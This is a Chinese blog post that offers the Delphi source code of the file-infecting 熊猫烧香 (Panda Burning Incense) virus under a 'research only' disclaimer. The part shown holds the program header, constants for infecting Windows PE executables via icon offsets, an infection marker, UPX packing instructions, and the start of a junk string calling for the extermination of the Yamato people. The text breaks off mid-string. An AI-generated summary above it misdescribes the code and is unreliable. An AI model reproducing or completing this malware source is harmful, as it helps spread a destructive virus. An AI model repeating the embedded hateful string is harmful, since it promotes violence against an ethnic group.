熊猫烧香 - 核心源码 (僅供研究使用!後果自行負責 )

原创

于 2007-03-01 11:01:00 发布 · 1.5k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#integer #delphi #string #function #windows #dst

本文深入探讨了熊猫烧香病毒的核心源码，详细分析了其在Windows平台上的运行机制，包括Integer、Delphi编程技巧、字符串处理以及 DST（动态地址定位）等关键要素。警告：仅供研究，使用后果自负。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

熊猫烧香 - 核心源码
--------------------------------------------------------------------------------
僅供研究使用!後果自行負責

代码:--------------------------------------------------------------------------------
程序代码
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记

//垃圾码，以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If